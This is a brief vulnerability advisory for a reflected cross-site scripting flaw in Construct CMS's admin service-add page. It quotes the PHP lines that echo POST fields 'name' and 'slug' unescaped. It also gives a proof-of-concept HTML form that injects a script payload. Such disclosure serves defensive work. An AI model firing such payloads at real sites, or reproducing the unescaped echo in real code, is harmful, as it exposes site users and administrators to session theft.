Title : Construct CMS - Cross-Site Scripting Author : Abolfazl Hajizade Category : Webapps tested on: Windows-linux Google Dork: N/A Vulnerable page: /construct/upload/cms/admin/service-add.php Vulnerable Source: line 133: "<?php if(isset($_POST['name'])){echo $_POST['name'];} ?>" line 139: "<?php if(isset($_POST['slug'])){echo $_POST['slug'];} ?>" POC: <html> <body> <form action="http://localhost/construct/upload/cms/admin/service-add.php" method="post"> <input type="text" name="name" value="<script>alert('ultrasec')</script>"/> <input type="submit" value="exploit"/> </form> </body> </html> ================================ WebSite : UltraSec.Org Channel : @UltraSecurity Email : zeroday1010@gmail.com Special Thanks : ashkan moghaddas , MrQadir , Milad Ranjbar